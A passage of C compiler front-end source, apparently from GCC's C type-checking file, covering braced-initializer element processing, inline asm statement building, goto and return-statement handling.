&& !comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (value)),
TYPE_MAIN_VARIANT (type)))
value = array_to_pointer_conversion (input_location, value);
if (TREE_CODE (value) == COMPOUND_LITERAL_EXPR
&& require_constant_value && pending)
{
/* As an extension, allow initializing objects with static storage
duration with compound literals (which are then treated just as
the brace enclosed list they contain). */
if (flag_isoc99)
pedwarn_init (loc, OPT_Wpedantic, "initializer element is not "
"constant");
tree decl = COMPOUND_LITERAL_EXPR_DECL (value);
value = DECL_INITIAL (decl);
}
npc = null_pointer_constant_p (value);
if (TREE_CODE (value) == EXCESS_PRECISION_EXPR)
{
semantic_type = TREE_TYPE (value);
value = TREE_OPERAND (value, 0);
}
value = c_fully_fold (value, require_constant_value, &maybe_const);
if (value == error_mark_node)
constructor_erroneous = 1;
else if (!TREE_CONSTANT (value))
constructor_constant = 0;
else if (!initializer_constant_valid_p (value,
TREE_TYPE (value),
AGGREGATE_TYPE_P (constructor_type)
&& TYPE_REVERSE_STORAGE_ORDER
(constructor_type))
|| (RECORD_OR_UNION_TYPE_P (constructor_type)
&& DECL_C_BIT_FIELD (field)
&& TREE_CODE (value) != INTEGER_CST))
constructor_simple = 0;
if (!maybe_const)
constructor_nonconst = 1;
/* Digest the initializer and issue any errors about incompatible
types before issuing errors about non-constant initializers. */
tree new_value = value;
if (semantic_type)
new_value = build1 (EXCESS_PRECISION_EXPR, semantic_type, value);
new_value = digest_init (loc, type, new_value, origtype, npc, strict_string,
require_constant_value);
if (new_value == error_mark_node)
{
constructor_erroneous = 1;
return;
}
if (require_constant_value || require_constant_elements)
constant_expression_warning (new_value);
/* Proceed to check the constness of the original initializer. */
if (!initializer_constant_valid_p (value, TREE_TYPE (value)))
{
if (require_constant_value)
{
error_init (loc, "initializer element is not constant");
value = error_mark_node;
}
else if (require_constant_elements)
pedwarn (loc, OPT_Wpedantic,
"initializer element is not computable at load time");
}
else if (!maybe_const
&& (require_constant_value || require_constant_elements))
pedwarn_init (loc, OPT_Wpedantic,
"initializer element is not a constant expression");
/* Issue -Wc++-compat warnings about initializing a bitfield with
enum type. */
if (warn_cxx_compat
&& field != NULL_TREE
&& TREE_CODE (field) == FIELD_DECL
&& DECL_BIT_FIELD_TYPE (field) != NULL_TREE
&& (TYPE_MAIN_VARIANT (DECL_BIT_FIELD_TYPE (field))
!= TYPE_MAIN_VARIANT (type))
&& TREE_CODE (DECL_BIT_FIELD_TYPE (field)) == ENUMERAL_TYPE)
{
tree checktype = origtype != NULL_TREE ? origtype : TREE_TYPE (value);
if (checktype != error_mark_node
&& (TYPE_MAIN_VARIANT (checktype)
!= TYPE_MAIN_VARIANT (DECL_BIT_FIELD_TYPE (field))))
warning_init (loc, OPT_Wc___compat,
"enum conversion in initialization is invalid in C++");
}
/* If this field is empty and does not have side effects (and is not at
the end of structure), don't do anything other than checking the
initializer. */
if (field
&& (TREE_TYPE (field) == error_mark_node
|| (COMPLETE_TYPE_P (TREE_TYPE (field))
&& integer_zerop (TYPE_SIZE (TREE_TYPE (field)))
&& !TREE_SIDE_EFFECTS (new_value)
&& (TREE_CODE (constructor_type) == ARRAY_TYPE
|| DECL_CHAIN (field)))))
return;
/* Finally, set VALUE to the initializer value digested above. */
value = new_value;
/* If this element doesn't come next in sequence,
put it on constructor_pending_elts. */
if (TREE_CODE (constructor_type) == ARRAY_TYPE
&& (!constructor_incremental
|| !tree_int_cst_equal (field, constructor_unfilled_index)))
{
if (constructor_incremental
&& tree_int_cst_lt (field, constructor_unfilled_index))
set_nonincremental_init (braced_init_obstack);
add_pending_init (loc, field, value, origtype, implicit,
braced_init_obstack);
return;
}
else if (TREE_CODE (constructor_type) == RECORD_TYPE
&& (!constructor_incremental
|| field != constructor_unfilled_fields))
{
/* We do this for records but not for unions. In a union,
no matter which field is specified, it can be initialized
right away since it starts at the beginning of the union. */
if (constructor_incremental)
{
if (!constructor_unfilled_fields)
set_nonincremental_init (braced_init_obstack);
else
{
tree bitpos, unfillpos;
bitpos = bit_position (field);
unfillpos = bit_position (constructor_unfilled_fields);
if (tree_int_cst_lt (bitpos, unfillpos))
set_nonincremental_init (braced_init_obstack);
}
}
add_pending_init (loc, field, value, origtype, implicit,
braced_init_obstack);
return;
}
else if (TREE_CODE (constructor_type) == UNION_TYPE
&& !vec_safe_is_empty (constructor_elements))
{
if (!implicit)
{
if (TREE_SIDE_EFFECTS (constructor_elements->last ().value))
warning_init (loc, OPT_Woverride_init_side_effects,
"initialized field with side-effects overwritten");
else if (warn_override_init)
warning_init (loc, OPT_Woverride_init,
"initialized field overwritten");
}
/* We can have just one union field set. */
constructor_elements = NULL;
}
/* Otherwise, output this element either to
constructor_elements or to the assembler file. */
constructor_elt celt = {field, value};
vec_safe_push (constructor_elements, celt);
/* Advance the variable that indicates sequential elements output. */
if (TREE_CODE (constructor_type) == ARRAY_TYPE)
constructor_unfilled_index
= size_binop_loc (input_location, PLUS_EXPR, constructor_unfilled_index,
bitsize_one_node);
else if (TREE_CODE (constructor_type) == RECORD_TYPE)
{
constructor_unfilled_fields
= DECL_CHAIN (constructor_unfilled_fields);
/* Skip any nameless bit fields. */
while (constructor_unfilled_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_unfilled_fields))
constructor_unfilled_fields =
DECL_CHAIN (constructor_unfilled_fields);
}
else if (TREE_CODE (constructor_type) == UNION_TYPE)
constructor_unfilled_fields = NULL_TREE;
/* Now output any pending elements which have become next. */
if (pending)
output_pending_init_elements (0, braced_init_obstack);
}
/* For two FIELD_DECLs in the same chain, return -1 if field1
comes before field2, 1 if field1 comes after field2 and
0 if field1 == field2. */
static int
init_field_decl_cmp (tree field1, tree field2)
{
if (field1 == field2)
return 0;
tree bitpos1 = bit_position (field1);
tree bitpos2 = bit_position (field2);
if (tree_int_cst_equal (bitpos1, bitpos2))
{
/* If one of the fields has non-zero bitsize, then that
field must be the last one in a sequence of zero
sized fields, fields after it will have bigger
bit_position. */
if (TREE_TYPE (field1) != error_mark_node
&& COMPLETE_TYPE_P (TREE_TYPE (field1))
&& integer_nonzerop (TREE_TYPE (field1)))
return 1;
if (TREE_TYPE (field2) != error_mark_node
&& COMPLETE_TYPE_P (TREE_TYPE (field2))
&& integer_nonzerop (TREE_TYPE (field2)))
return -1;
/* Otherwise, fallback to DECL_CHAIN walk to find out
which field comes earlier. Walk chains of both
fields, so that if field1 and field2 are close to each
other in either order, it is found soon even for large
sequences of zero sized fields. */
tree f1 = field1, f2 = field2;
while (1)
{
f1 = DECL_CHAIN (f1);
f2 = DECL_CHAIN (f2);
if (f1 == NULL_TREE)
{
gcc_assert (f2);
return 1;
}
if (f2 == NULL_TREE)
return -1;
if (f1 == field2)
return -1;
if (f2 == field1)
return 1;
if (!tree_int_cst_equal (bit_position (f1), bitpos1))
return 1;
if (!tree_int_cst_equal (bit_position (f2), bitpos1))
return -1;
}
}
else if (tree_int_cst_lt (bitpos1, bitpos2))
return -1;
else
return 1;
}
/* Output any pending elements which have become next.
As we output elements, constructor_unfilled_{fields,index}
advances, which may cause other elements to become next;
if so, they too are output.
If ALL is 0, we return when there are
no more pending elements to output now.
If ALL is 1, we output space as necessary so that
we can output all the pending elements. */
static void
output_pending_init_elements (int all, struct obstack * braced_init_obstack)
{
struct init_node *elt = constructor_pending_elts;
tree next;
retry:
/* Look through the whole pending tree.
If we find an element that should be output now,
output it. Otherwise, set NEXT to the element
that comes first among those still pending. */
next = NULL_TREE;
while (elt)
{
if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (tree_int_cst_equal (elt->purpose,
constructor_unfilled_index))
output_init_element (input_location, elt->value, elt->origtype,
true, TREE_TYPE (constructor_type),
constructor_unfilled_index, false, false,
braced_init_obstack);
else if (tree_int_cst_lt (constructor_unfilled_index,
elt->purpose))
{
/* Advance to the next smaller node. */
if (elt->left)
elt = elt->left;
else
{
/* We have reached the smallest node bigger than the
current unfilled index. Fill the space first. */
next = elt->purpose;
break;
}
}
else
{
/* Advance to the next bigger node. */
if (elt->right)
elt = elt->right;
else
{
/* We have reached the biggest node in a subtree. Find
the parent of it, which is the next bigger node. */
while (elt->parent && elt->parent->right == elt)
elt = elt->parent;
elt = elt->parent;
if (elt && tree_int_cst_lt (constructor_unfilled_index,
elt->purpose))
{
next = elt->purpose;
break;
}
}
}
}
else if (RECORD_OR_UNION_TYPE_P (constructor_type))
{
/* If the current record is complete we are done. */
if (constructor_unfilled_fields == NULL_TREE)
break;
int cmp = init_field_decl_cmp (constructor_unfilled_fields,
elt->purpose);
if (cmp == 0)
output_init_element (input_location, elt->value, elt->origtype,
true, TREE_TYPE (elt->purpose),
elt->purpose, false, false,
braced_init_obstack);
else if (cmp < 0)
{
/* Advance to the next smaller node. */
if (elt->left)
elt = elt->left;
else
{
/* We have reached the smallest node bigger than the
current unfilled field. Fill the space first. */
next = elt->purpose;
break;
}
}
else
{
/* Advance to the next bigger node. */
if (elt->right)
elt = elt->right;
else
{
/* We have reached the biggest node in a subtree. Find
the parent of it, which is the next bigger node. */
while (elt->parent && elt->parent->right == elt)
elt = elt->parent;
elt = elt->parent;
if (elt
&& init_field_decl_cmp (constructor_unfilled_fields,
elt->purpose) < 0)
{
next = elt->purpose;
break;
}
}
}
}
}
/* Ordinarily return, but not if we want to output all
and there are elements left. */
if (!(all && next != NULL_TREE))
return;
/* If it's not incremental, just skip over the gap, so that after
jumping to retry we will output the next successive element. */
if (RECORD_OR_UNION_TYPE_P (constructor_type))
constructor_unfilled_fields = next;
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
constructor_unfilled_index = next;
/* ELT now points to the node in the pending tree with the next
initializer to output. */
goto retry;
}
/* Expression VALUE coincides with the start of type TYPE in a braced
initializer. Return true if we should treat VALUE as initializing
the first element of TYPE, false if we should treat it as initializing
TYPE as a whole.
If the initializer is clearly invalid, the question becomes:
which choice gives the best error message? */
static bool
initialize_elementwise_p (tree type, tree value)
{
if (type == error_mark_node || value == error_mark_node)
return false;
gcc_checking_assert (TYPE_MAIN_VARIANT (type) == type);
tree value_type = TREE_TYPE (value);
if (value_type == error_mark_node)
return false;
/* GNU vectors can be initialized elementwise. However, treat any
kind of vector value as initializing the vector type as a whole,
regardless of whether the value is a GNU vector. Such initializers
are valid if and only if they would have been valid in a non-braced
initializer like:
TYPE foo = VALUE;
so recursing into the vector type would be at best confusing or at
worst wrong. For example, when -flax-vector-conversions is in effect,
it's possible to initialize a V8HI from a V4SI, even though the vectors
have different element types and different numbers of elements. */
if (gnu_vector_type_p (type))
return !VECTOR_TYPE_P (value_type);
if (AGGREGATE_TYPE_P (type))
return type != TYPE_MAIN_VARIANT (value_type);
return false;
}
/* Add one non-braced element to the current constructor level.
This adjusts the current position within the constructor's type.
This may also start or terminate implicit levels
to handle a partly-braced initializer.
Once this has found the correct level for the new element,
it calls output_init_element.
IMPLICIT is true if value comes from pop_init_level (1),
the new initializer has been merged with the existing one
and thus no warnings should be emitted about overriding an
existing initializer. */
void
process_init_element (location_t loc, struct c_expr value, bool implicit,
struct obstack * braced_init_obstack)
{
tree orig_value = value.value;
int string_flag
= (orig_value != NULL_TREE && TREE_CODE (orig_value) == STRING_CST);
bool strict_string = value.original_code == STRING_CST;
bool was_designated = designator_depth != 0;
designator_depth = 0;
designator_erroneous = 0;
if (!implicit && value.value && !integer_zerop (value.value))
constructor_zeroinit = 0;
/* Handle superfluous braces around string cst as in
char x[] = {"foo"}; */
if (string_flag
&& constructor_type
&& !was_designated
&& TREE_CODE (constructor_type) == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (constructor_type))
&& integer_zerop (constructor_unfilled_index))
{
if (constructor_stack->replacement_value.value)
error_init (loc, "excess elements in %<char%> array initializer");
constructor_stack->replacement_value = value;
return;
}
if (constructor_stack->replacement_value.value != NULL_TREE)
{
error_init (loc, "excess elements in struct initializer");
return;
}
/* Ignore elements of a brace group if it is entirely superfluous
and has already been diagnosed, or if the type is erroneous. */
if (constructor_type == NULL_TREE || constructor_type == error_mark_node)
return;
/* Ignore elements of an initializer for a variable-size type.
Those are diagnosed in digest_init. */
if (COMPLETE_TYPE_P (constructor_type)
&& !poly_int_tree_p (TYPE_SIZE (constructor_type)))
return;
if (!implicit && warn_designated_init && !was_designated
&& TREE_CODE (constructor_type) == RECORD_TYPE
&& lookup_attribute ("designated_init",
TYPE_ATTRIBUTES (constructor_type)))
warning_init (loc,
OPT_Wdesignated_init,
"positional initialization of field "
"in %<struct%> declared with %<designated_init%> attribute");
/* If we've exhausted any levels that didn't have braces,
pop them now. */
while (constructor_stack->implicit)
{
if (RECORD_OR_UNION_TYPE_P (constructor_type)
&& constructor_fields == NULL_TREE)
process_init_element (loc,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
else if ((TREE_CODE (constructor_type) == ARRAY_TYPE
|| gnu_vector_type_p (constructor_type))
&& constructor_max_index
&& tree_int_cst_lt (constructor_max_index,
constructor_index))
process_init_element (loc,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
else
break;
}
/* In the case of [LO ... HI] = VALUE, only evaluate VALUE once. */
if (constructor_range_stack)
{
/* If value is a compound literal and we'll be just using its
content, don't put it into a SAVE_EXPR. */
if (TREE_CODE (value.value) != COMPOUND_LITERAL_EXPR
|| !require_constant_value)
{
tree semantic_type = NULL_TREE;
if (TREE_CODE (value.value) == EXCESS_PRECISION_EXPR)
{
semantic_type = TREE_TYPE (value.value);
value.value = TREE_OPERAND (value.value, 0);
}
value.value = save_expr (value.value);
if (semantic_type)
value.value = build1 (EXCESS_PRECISION_EXPR, semantic_type,
value.value);
}
}
while (1)
{
if (TREE_CODE (constructor_type) == RECORD_TYPE)
{
tree fieldtype;
enum tree_code fieldcode;
if (constructor_fields == NULL_TREE)
{
pedwarn_init (loc, 0, "excess elements in struct initializer");
break;
}
fieldtype = TREE_TYPE (constructor_fields);
if (fieldtype != error_mark_node)
fieldtype = TYPE_MAIN_VARIANT (fieldtype);
fieldcode = TREE_CODE (fieldtype);
/* Error for non-static initialization of a flexible array member. */
if (fieldcode == ARRAY_TYPE
&& !require_constant_value
&& TYPE_SIZE (fieldtype) == NULL_TREE
&& DECL_CHAIN (constructor_fields) == NULL_TREE)
{
error_init (loc, "non-static initialization of a flexible "
"array member");
break;
}
/* Error for initialization of a flexible array member with
a string constant if the structure is in an array. E.g.:
struct S { int x; char y[]; };
struct S s[] = { { 1, "foo" } };
is invalid. */
if (string_flag
&& fieldcode == ARRAY_TYPE
&& constructor_depth > 1
&& TYPE_SIZE (fieldtype) == NULL_TREE
&& DECL_CHAIN (constructor_fields) == NULL_TREE)
{
bool in_array_p = false;
for (struct constructor_stack *p = constructor_stack;
p && p->type; p = p->next)
if (TREE_CODE (p->type) == ARRAY_TYPE)
{
in_array_p = true;
break;
}
if (in_array_p)
{
error_init (loc, "initialization of flexible array "
"member in a nested context");
break;
}
}
/* Accept a string constant to initialize a subarray. */
if (value.value != NULL_TREE
&& fieldcode == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (fieldtype))
&& string_flag)
value.value = orig_value;
/* Otherwise, if we have come to a subaggregate,
and we don't have an element of its type, push into it. */
else if (value.value != NULL_TREE
&& initialize_elementwise_p (fieldtype, value.value))
{
push_init_level (loc, 1, braced_init_obstack);
continue;
}
if (value.value)
{
push_member_name (constructor_fields);
output_init_element (loc, value.value, value.original_type,
strict_string, fieldtype,
constructor_fields, true, implicit,
braced_init_obstack);
RESTORE_SPELLING_DEPTH (constructor_depth);
}
else
/* Do the bookkeeping for an element that was
directly output as a constructor. */
{
/* For a record, keep track of end position of last field. */
if (DECL_SIZE (constructor_fields))
constructor_bit_index
= size_binop_loc (input_location, PLUS_EXPR,
bit_position (constructor_fields),
DECL_SIZE (constructor_fields));
/* If the current field was the first one not yet written out,
it isn't now, so update. */
if (constructor_unfilled_fields == constructor_fields)
{
constructor_unfilled_fields = DECL_CHAIN (constructor_fields);
/* Skip any nameless bit fields. */
while (constructor_unfilled_fields != 0
&& (DECL_UNNAMED_BIT_FIELD
(constructor_unfilled_fields)))
constructor_unfilled_fields =
DECL_CHAIN (constructor_unfilled_fields);
}
}
constructor_fields = DECL_CHAIN (constructor_fields);
/* Skip any nameless bit fields at the beginning. */
while (constructor_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_fields))
constructor_fields = DECL_CHAIN (constructor_fields);
}
else if (TREE_CODE (constructor_type) == UNION_TYPE)
{
tree fieldtype;
enum tree_code fieldcode;
if (constructor_fields == NULL_TREE)
{
pedwarn_init (loc, 0,
"excess elements in union initializer");
break;
}
fieldtype = TREE_TYPE (constructor_fields);
if (fieldtype != error_mark_node)
fieldtype = TYPE_MAIN_VARIANT (fieldtype);
fieldcode = TREE_CODE (fieldtype);
/* Warn that traditional C rejects initialization of unions.
We skip the warning if the value is zero. This is done
under the assumption that the zero initializer in user
code appears conditioned on e.g. __STDC__ to avoid
"missing initializer" warnings and relies on default
initialization to zero in the traditional C case.
We also skip the warning if the initializer is designated,
again on the assumption that this must be conditional on
__STDC__ anyway (and we've already complained about the
member-designator already). */
if (!in_system_header_at (input_location) && !constructor_designated
&& !(value.value && (integer_zerop (value.value)
|| real_zerop (value.value))))
warning (OPT_Wtraditional, "traditional C rejects initialization "
"of unions");
/* Accept a string constant to initialize a subarray. */
if (value.value != NULL_TREE
&& fieldcode == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (fieldtype))
&& string_flag)
value.value = orig_value;
/* Otherwise, if we have come to a subaggregate,
and we don't have an element of its type, push into it. */
else if (value.value != NULL_TREE
&& initialize_elementwise_p (fieldtype, value.value))
{
push_init_level (loc, 1, braced_init_obstack);
continue;
}
if (value.value)
{
push_member_name (constructor_fields);
output_init_element (loc, value.value, value.original_type,
strict_string, fieldtype,
constructor_fields, true, implicit,
braced_init_obstack);
RESTORE_SPELLING_DEPTH (constructor_depth);
}
else
/* Do the bookkeeping for an element that was
directly output as a constructor. */
{
constructor_bit_index = DECL_SIZE (constructor_fields);
constructor_unfilled_fields = DECL_CHAIN (constructor_fields);
}
constructor_fields = NULL_TREE;
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
tree elttype = TYPE_MAIN_VARIANT (TREE_TYPE (constructor_type));
enum tree_code eltcode = TREE_CODE (elttype);
/* Accept a string constant to initialize a subarray. */
if (value.value != NULL_TREE
&& eltcode == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (elttype))
&& string_flag)
value.value = orig_value;
/* Otherwise, if we have come to a subaggregate,
and we don't have an element of its type, push into it. */
else if (value.value != NULL_TREE
&& initialize_elementwise_p (elttype, value.value))
{
push_init_level (loc, 1, braced_init_obstack);
continue;
}
if (constructor_max_index != NULL_TREE
&& (tree_int_cst_lt (constructor_max_index, constructor_index)
|| integer_all_onesp (constructor_max_index)))
{
pedwarn_init (loc, 0,
"excess elements in array initializer");
break;
}
/* Now output the actual element. */
if (value.value)
{
push_array_bounds (tree_to_uhwi (constructor_index));
output_init_element (loc, value.value, value.original_type,
strict_string, elttype,
constructor_index, true, implicit,
braced_init_obstack);
RESTORE_SPELLING_DEPTH (constructor_depth);
}
constructor_index
= size_binop_loc (input_location, PLUS_EXPR,
constructor_index, bitsize_one_node);
if (!value.value)
/* If we are doing the bookkeeping for an element that was
directly output as a constructor, we must update
constructor_unfilled_index. */
constructor_unfilled_index = constructor_index;
}
else if (gnu_vector_type_p (constructor_type))
{
tree elttype = TYPE_MAIN_VARIANT (TREE_TYPE (constructor_type));
/* Do a basic check of initializer size. Note that vectors
always have a fixed size derived from their type. */
if (tree_int_cst_lt (constructor_max_index, constructor_index))
{
pedwarn_init (loc, 0,
"excess elements in vector initializer");
break;
}
/* Now output the actual element. */
if (value.value)
{
if (TREE_CODE (value.value) == VECTOR_CST)
elttype = TYPE_MAIN_VARIANT (constructor_type);
output_init_element (loc, value.value, value.original_type,
strict_string, elttype,
constructor_index, true, implicit,
braced_init_obstack);
}
constructor_index
= size_binop_loc (input_location,
PLUS_EXPR, constructor_index, bitsize_one_node);
if (!value.value)
/* If we are doing the bookkeeping for an element that was
directly output as a constructor, we must update
constructor_unfilled_index. */
constructor_unfilled_index = constructor_index;
}
/* Handle the sole element allowed in a braced initializer
for a scalar variable. */
else if (constructor_type != error_mark_node
&& constructor_fields == NULL_TREE)
{
pedwarn_init (loc, 0,
"excess elements in scalar initializer");
break;
}
else
{
if (value.value)
output_init_element (loc, value.value, value.original_type,
strict_string, constructor_type,
NULL_TREE, true, implicit,
braced_init_obstack);
constructor_fields = NULL_TREE;
}
/* Handle range initializers either at this level or anywhere higher
in the designator stack. */
if (constructor_range_stack)
{
struct constructor_range_stack *p, *range_stack;
int finish = 0;
range_stack = constructor_range_stack;
constructor_range_stack = 0;
while (constructor_stack != range_stack->stack)
{
gcc_assert (constructor_stack->implicit);
process_init_element (loc,
pop_init_level (loc, 1,
braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
}
for (p = range_stack;
!p->range_end || tree_int_cst_equal (p->index, p->range_end);
p = p->prev)
{
gcc_assert (constructor_stack->implicit);
process_init_element (loc,
pop_init_level (loc, 1,
braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
}
p->index = size_binop_loc (input_location,
PLUS_EXPR, p->index, bitsize_one_node);
if (tree_int_cst_equal (p->index, p->range_end) && !p->prev)
finish = 1;
while (1)
{
constructor_index = p->index;
constructor_fields = p->fields;
if (finish && p->range_end && p->index == p->range_start)
{
finish = 0;
p->prev = 0;
}
p = p->next;
if (!p)
break;
finish_implicit_inits (loc, braced_init_obstack);
push_init_level (loc, 2, braced_init_obstack);
p->stack = constructor_stack;
if (p->range_end && tree_int_cst_equal (p->index, p->range_end))
p->index = p->range_start;
}
if (!finish)
constructor_range_stack = range_stack;
continue;
}
break;
}
constructor_range_stack = 0;
}
/* Build a complete asm-statement, whose components are a CV_QUALIFIER
(guaranteed to be 'volatile' or null) and ARGS (represented using
an ASM_EXPR node). */
tree
build_asm_stmt (bool is_volatile, tree args)
{
if (is_volatile)
ASM_VOLATILE_P (args) = 1;
return add_stmt (args);
}
/* Build an asm-expr, whose components are a STRING, some OUTPUTS,
some INPUTS, and some CLOBBERS. The latter three may be NULL.
SIMPLE indicates whether there was anything at all after the
string in the asm expression -- asm("blah") and asm("blah" : )
are subtly different. We use a ASM_EXPR node to represent this.
LOC is the location of the asm, and IS_INLINE says whether this
is asm inline. */
tree
build_asm_expr (location_t loc, tree string, tree outputs, tree inputs,
tree clobbers, tree labels, bool simple, bool is_inline)
{
tree tail;
tree args;
int i;
const char *constraint;
const char **oconstraints;
bool allows_mem, allows_reg, is_inout;
int ninputs, noutputs;
ninputs = list_length (inputs);
noutputs = list_length (outputs);
oconstraints = (const char **) alloca (noutputs * sizeof (const char *));
string = resolve_asm_operand_names (string, outputs, inputs, labels);
/* Remove output conversions that change the type but not the mode. */
for (i = 0, tail = outputs; tail; ++i, tail = TREE_CHAIN (tail))
{
tree output = TREE_VALUE (tail);
output = c_fully_fold (output, false, NULL, true);
/* ??? Really, this should not be here. Users should be using a
proper lvalue, dammit. But there's a long history of using casts
in the output operands. In cases like longlong.h, this becomes a
primitive form of typechecking -- if the cast can be removed, then
the output operand had a type of the proper width; otherwise we'll
get an error. Gross, but ... */
STRIP_NOPS (output);
if (!lvalue_or_else (loc, output, lv_asm))
output = error_mark_node;
if (output != error_mark_node
&& (TREE_READONLY (output)
|| TYPE_READONLY (TREE_TYPE (output))
|| (RECORD_OR_UNION_TYPE_P (TREE_TYPE (output))
&& C_TYPE_FIELDS_READONLY (TREE_TYPE (output)))))
readonly_error (loc, output, lv_asm);
constraint = TREE_STRING_POINTER (TREE_VALUE (TREE_PURPOSE (tail)));
oconstraints[i] = constraint;
if (parse_output_constraint (&constraint, i, ninputs, noutputs,
&allows_mem, &allows_reg, &is_inout))
{
/* If the operand is going to end up in memory,
mark it addressable. */
if (!allows_reg && !c_mark_addressable (output))
output = error_mark_node;
if (!(!allows_reg && allows_mem)
&& output != error_mark_node
&& VOID_TYPE_P (TREE_TYPE (output)))
{
error_at (loc, "invalid use of void expression");
output = error_mark_node;
}
}
else
output = error_mark_node;
TREE_VALUE (tail) = output;
}
for (i = 0, tail = inputs; tail; ++i, tail = TREE_CHAIN (tail))
{
tree input;
constraint = TREE_STRING_POINTER (TREE_VALUE (TREE_PURPOSE (tail)));
input = TREE_VALUE (tail);
if (parse_input_constraint (&constraint, i, ninputs, noutputs, 0,
oconstraints, &allows_mem, &allows_reg))
{
/* If the operand is going to end up in memory,
mark it addressable. */
if (!allows_reg && allows_mem)
{
input = c_fully_fold (input, false, NULL, true);
/* Strip the nops as we allow this case. FIXME, this really
should be rejected or made deprecated. */
STRIP_NOPS (input);
if (!c_mark_addressable (input))
input = error_mark_node;
}
else
{
struct c_expr expr;
memset (&expr, 0, sizeof (expr));
expr.value = input;
expr = convert_lvalue_to_rvalue (loc, expr, true, false);
input = c_fully_fold (expr.value, false, NULL);
if (input != error_mark_node && VOID_TYPE_P (TREE_TYPE (input)))
{
error_at (loc, "invalid use of void expression");
input = error_mark_node;
}
}
}
else
input = error_mark_node;
TREE_VALUE (tail) = input;
}
/* ASMs with labels cannot have outputs. This should have been
enforced by the parser. */
gcc_assert (outputs == NULL || labels == NULL);
args = build_stmt (loc, ASM_EXPR, string, outputs, inputs, clobbers, labels);
/* asm statements without outputs, including simple ones, are treated
as volatile. */
ASM_INPUT_P (args) = simple;
ASM_VOLATILE_P (args) = (noutputs == 0);
ASM_INLINE_P (args) = is_inline;
return args;
}
/* Generate a goto statement to LABEL. LOC is the location of the
GOTO. */
tree
c_finish_goto_label (location_t loc, tree label)
{
tree decl = lookup_label_for_goto (loc, label);
if (!decl)
return NULL_TREE;
TREE_USED (decl) = 1;
{
add_stmt (build_predict_expr (PRED_GOTO, NOT_TAKEN));
tree t = build1 (GOTO_EXPR, void_type_node, decl);
SET_EXPR_LOCATION (t, loc);
return add_stmt (t);
}
}
/* Generate a computed goto statement to EXPR. LOC is the location of
the GOTO. */
tree
c_finish_goto_ptr (location_t loc, tree expr)
{
tree t;
pedwarn (loc, OPT_Wpedantic, "ISO C forbids %<goto *expr;%>");
expr = c_fully_fold (expr, false, NULL);
expr = convert (ptr_type_node, expr);
t = build1 (GOTO_EXPR, void_type_node, expr);
SET_EXPR_LOCATION (t, loc);
return add_stmt (t);
}
/* Generate a C `return' statement. RETVAL is the expression for what
to return, or a null pointer for `return;' with no value. LOC is
the location of the return statement, or the location of the expression,
if the statement has any. If ORIGTYPE is not NULL_TREE, it
is the original type of RETVAL. */
tree
c_finish_return (location_t loc, tree retval, tree origtype)
{
tree valtype = TREE_TYPE (TREE_TYPE (current_function_decl)), ret_stmt;
bool no_warning = false;
bool npc = false;
/* Use the expansion point to handle cases such as returning NULL
in a function returning void. */
location_t xloc = expansion_point_location_if_in_system_header (loc);
if (TREE_THIS_VOLATILE (current_function_decl))
warning_at (xloc, 0,
"function declared %<noreturn%> has a %<return%> statement");
if (retval)
{
tree semantic_type = NULL_TREE;
npc = null_pointer_constant_p (retval);
if (TREE_CODE (retval) == EXCESS_PRECISION_EXPR)
{
semantic_type = TREE_TYPE (retval);
retval = TREE_OPERAND (retval, 0);
}
retval = c_fully_fold (retval, false, NULL);
if (semantic_type
&& valtype != NULL_TREE
&& TREE_CODE (valtype) != VOID_TYPE)
retval = build1 (EXCESS_PRECISION_EXPR, semantic_type, retval);
}
if (!retval)
{
current_function_returns_null = 1;
if ((warn_return_type >= 0 || flag_isoc99)
&& valtype != NULL_TREE && TREE_CODE (valtype) != VOID_TYPE)
{
bool warned_here;
if (flag_isoc99)
warned_here = pedwarn
(loc, warn_return_type >= 0 ? OPT_Wreturn_type : 0,
"%<return%> with no value, in function returning non-void");
else
warned_here = warning_at
(loc, OPT_Wreturn_type,
"%<return%> with no value, in function returning non-void");
no_warning = true;
if (warned_here)
inform (DECL_SOURCE_LOCATION (current_function_decl),
"declared here");
}
}
else if (valtype == NULL_TREE || TREE_CODE (valtype) == VOID_TYPE)
{
current_function_returns_null = 1;
bool warned_here;
if (TREE_CODE (TREE_TYPE (retval)) != VOID_TYPE)
warned_here = pedwarn
(xloc, warn_return_type >= 0 ? OPT_Wreturn_type : 0,
"%<return%> with a value, in function returning void");
else
warned_here = pedwarn
(xloc, OPT_Wpedantic, "ISO C forbids "
"%<return%> with expression, in function returning void");
if (warned_here)
inform (DECL_SOURCE_LOCATION (current_function_decl),
"declared here");
}
else
{
tree t = convert_for_assignment (loc, UNKNOWN_LOCATION, valtype,
retval, origtype, ic_return,
npc, NULL_TREE, NULL_TREE, 0);
tree res = DECL_RESULT (current_function_decl);
tree inner;
bool save;
current_function_returns_value = 1;
if (t == error_mark_node)
return NULL_TREE;
save = in_late_binary_op;
if (TREE_CODE (TREE_TYPE (res)) == BOOLEAN_TYPE
|| TREE_CODE (TREE_TYPE (res)) == COMPLEX_TYPE
|| (TREE_CODE (TREE_TYPE (t)) == REAL_TYPE
&& (TREE_CODE (TREE_TYPE (res)) == INTEGER_TYPE
|| TREE_CODE (TREE_TYPE (res)) == ENUMERAL_TYPE)
&& sanitize_flags_p (SANITIZE_FLOAT_CAST)))
in_late_binary_op = true;
inner = t = convert (TREE_TYPE (res), t);
in_late_binary_op = save;
/* Strip any conversions, additions, and subtractions, and see if
we are returning the address of a local variable. Warn if so. */
while (1)
{
switch (TREE_CODE (inner))
{
CASE_CONVERT:
case NON_LVALUE_EXPR:
case PLUS_EXPR:
case POINTER_PLUS_EXPR:
inner = TREE_OPERAND (inner, 0);
continue;
case MINUS_EXPR:
